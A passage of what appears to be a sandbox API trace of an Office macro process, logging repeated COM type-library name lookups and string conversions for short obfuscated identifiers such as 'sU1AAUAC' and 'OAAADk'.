pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b801ea, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="sU1AAUAC") returned 9 [0069.290] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="sU1AAUAC", lHashVal=0x104d81, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b801ea, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="sU1AAUAC") returned 9 [0069.291] ITypeComp:RemoteBind (in: This=0x665bd30, szName="sU1AAUAC", lHashVal=0x104d81, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sU1AAUAC") returned 0x104d81 [0069.291] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="sU1AAUAC" | out: _Dst="sU1AAUAC") returned 0x0 [0069.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="sU1AAUAC") returned 9 [0069.291] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.291] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="sU1AAUAC", lHashVal=0x104d81, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.291] IUnknown:Release (This=0x665ba50) returned 0xd [0069.291] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.291] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="sU1AAUAC", lHashVal=0x104d81, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.291] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.291] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.291] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="sU1AAUAC", lHashVal=0x104d81, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.291] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.291] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.291] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="sU1AAUAC", lHashVal=0x104d81, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.291] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b801ea, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="sU1AAUAC") returned 9 [0069.291] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="sU1AAUAC", lHashVal=0x104d81, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.291] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.291] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b801ea | out: _Dst=0x67c2d40) returned 0x0 [0069.291] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_sU1AAUAC") returned 0x10250a [0069.291] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_sU1AAUAC" | out: _Dst="_B_var_sU1AAUAC") returned 0x0 [0069.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_sU1AAUAC") returned 16 [0069.291] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.291] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_sU1AAUAC", lHashVal=0x10250a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.291] IUnknown:Release (This=0x665ba50) returned 0xd [0069.292] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.292] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_sU1AAUAC", lHashVal=0x10250a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.292] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.292] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.292] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_sU1AAUAC", lHashVal=0x10250a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.292] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.292] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.292] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_sU1AAUAC", lHashVal=0x10250a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.292] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.292] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.292] IUnknown:Release (This=0x665ba50) returned 0xd [0069.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b120ee, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_sU1AAUAC") returned 16 [0069.292] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_sU1AAUAC", lHashVal=0x10250a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.292] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b801ea | out: _Dst=0x144ec0) returned 0x0 [0069.292] ITypeComp:RemoteBind (in: This=0x665ba60, szName="s1AA_QA", lHashVal=0x10275b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80216, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="s1AA_QA") returned 8 [0069.292] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="s1AA_QA", lHashVal=0x10275b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80216, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="s1AA_QA") returned 8 [0069.292] ITypeComp:RemoteBind (in: This=0x665bd30, szName="s1AA_QA", lHashVal=0x10275b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.292] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="s1AA_QA") returned 0x10275b [0069.292] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="s1AA_QA" | out: _Dst="s1AA_QA") returned 0x0 [0069.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="s1AA_QA") returned 8 [0069.293] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.293] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="s1AA_QA", lHashVal=0x10275b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.293] IUnknown:Release (This=0x665ba50) returned 0xd [0069.293] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.293] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="s1AA_QA", lHashVal=0x10275b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.293] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.293] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.293] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="s1AA_QA", lHashVal=0x10275b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.293] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.293] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.293] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="s1AA_QA", lHashVal=0x10275b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.293] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80216, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="s1AA_QA") returned 8 [0069.293] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="s1AA_QA", lHashVal=0x10275b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.293] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.293] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80216 | out: _Dst=0x67c2d40) returned 0x0 [0069.293] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_s1AA_QA") returned 0x102adf [0069.293] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_s1AA_QA" | out: _Dst="_B_var_s1AA_QA") returned 0x0 [0069.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_s1AA_QA") returned 15 [0069.293] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.293] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_s1AA_QA", lHashVal=0x102adf, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.293] IUnknown:Release (This=0x665ba50) returned 0xd [0069.293] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.293] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_s1AA_QA", lHashVal=0x102adf, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.293] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.293] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.293] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_s1AA_QA", lHashVal=0x102adf, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.293] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.293] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.294] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_s1AA_QA", lHashVal=0x102adf, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.294] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.294] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.294] IUnknown:Release (This=0x665ba50) returned 0xd [0069.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1211e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_s1AA_QA") returned 15 [0069.294] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_s1AA_QA", lHashVal=0x102adf, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x5f004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x5f004100000000, pDummy=0x0) returned 0x0 [0069.294] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80216 | out: _Dst=0x144ec0) returned 0x0 [0069.294] ITypeComp:RemoteBind (in: This=0x665ba60, szName="OAAADk", lHashVal=0x10949f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8023e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="OAAADk") returned 7 [0069.294] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="OAAADk", lHashVal=0x10949f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8023e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="OAAADk") returned 7 [0069.294] ITypeComp:RemoteBind (in: This=0x665bd30, szName="OAAADk", lHashVal=0x10949f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.294] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OAAADk") returned 0x10949f [0069.294] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="OAAADk" | out: _Dst="OAAADk") returned 0x0 [0069.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="OAAADk") returned 7 [0069.294] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.294] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="OAAADk", lHashVal=0x10949f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.294] IUnknown:Release (This=0x665ba50) returned 0xd [0069.294] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.294] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="OAAADk", lHashVal=0x10949f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.294] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.294] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.295] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="OAAADk", lHashVal=0x10949f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.295] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.295] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.295] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="OAAADk", lHashVal=0x10949f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.295] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8023e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="OAAADk") returned 7 [0069.295] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="OAAADk", lHashVal=0x10949f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.295] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.295] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8023e | out: _Dst=0x67c2d40) returned 0x0 [0069.295] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_OAAADk") returned 0x100f09 [0069.295] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_OAAADk" | out: _Dst="_B_var_OAAADk") returned 0x0 [0069.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_OAAADk") returned 14 [0069.295] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.295] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_OAAADk", lHashVal=0x100f09, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.295] IUnknown:Release (This=0x665ba50) returned 0xd [0069.295] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.295] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_OAAADk", lHashVal=0x100f09, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.295] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.295] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.295] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_OAAADk", lHashVal=0x100f09, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.295] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.295] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.295] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_OAAADk", lHashVal=0x100f09, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.295] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.295] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.295] IUnknown:Release (This=0x665ba50) returned 0xd [0069.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1214e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_OAAADk") returned 14 [0069.295] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_OAAADk", lHashVal=0x100f09, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0) returned 0x0 [0069.296] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8023e | out: _Dst=0x144ec0) returned 0x0 [0069.296] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wACQAD", lHashVal=0x1013b0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80266, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wACQAD") returned 7 [0069.296] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wACQAD", lHashVal=0x1013b0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80266, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wACQAD") returned 7 [0069.296] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wACQAD", lHashVal=0x1013b0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.296] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wACQAD") returned 0x1013b0 [0069.296] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="wACQAD" | out: _Dst="wACQAD") returned 0x0 [0069.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="wACQAD") returned 7 [0069.296] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.296] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wACQAD", lHashVal=0x1013b0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.296] IUnknown:Release (This=0x665ba50) returned 0xd [0069.296] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.296] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wACQAD", lHashVal=0x1013b0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.296] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.296] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.296] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wACQAD", lHashVal=0x1013b0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.296] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.296] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.296] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wACQAD", lHashVal=0x1013b0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.296] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80266, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="wACQAD") returned 7 [0069.297] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wACQAD", lHashVal=0x1013b0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.297] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.297] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80266 | out: _Dst=0x67c2d40) returned 0x0 [0069.297] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wACQAD") returned 0x108e59 [0069.297] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_wACQAD" | out: _Dst="_B_var_wACQAD") returned 0x0 [0069.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_wACQAD") returned 14 [0069.297] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.297] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wACQAD", lHashVal=0x108e59, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.297] IUnknown:Release (This=0x665ba50) returned 0xd [0069.297] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.297] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wACQAD", lHashVal=0x108e59, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.297] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.297] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.297] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wACQAD", lHashVal=0x108e59, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.297] IUnknown:Release (This=0x665bd20) returned 0x6 